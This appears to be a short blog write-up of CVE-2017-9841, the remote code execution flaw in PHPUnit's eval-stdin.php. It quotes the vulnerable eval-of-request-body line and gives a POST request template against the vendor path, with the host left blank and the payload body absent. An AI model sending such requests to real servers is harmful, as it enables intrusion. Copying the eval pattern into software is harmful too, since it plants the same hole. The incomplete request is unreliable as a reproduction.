Phpunit Eval Stdin Php Remote Command Execution Vulnerability Cve 2017 9841
Phpunit Eval Stdin Php Remote Command Execution Vulnerability Cve 2017 9841
PHPUnit eval-stdin.php remote command execution vulnerability CVE-2017-9841
Vulnerability Description
In the version before PHPUnit 5.6.3, there is a remote code execution vulnerability, which can obtain sensitive information and permissions of the server.
Vulnerability Impact
PHPUnit < 5.6.3
Vulnerability reappears
The vulnerability is located in /phpunit/src/Util/PHP/eval-stdin.php
The key code is:
eval('?>'.file_get_contents('php://input'));
Send the following request package to execute PHP code
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip
This post is licensed under CC BY 4.0 by the author.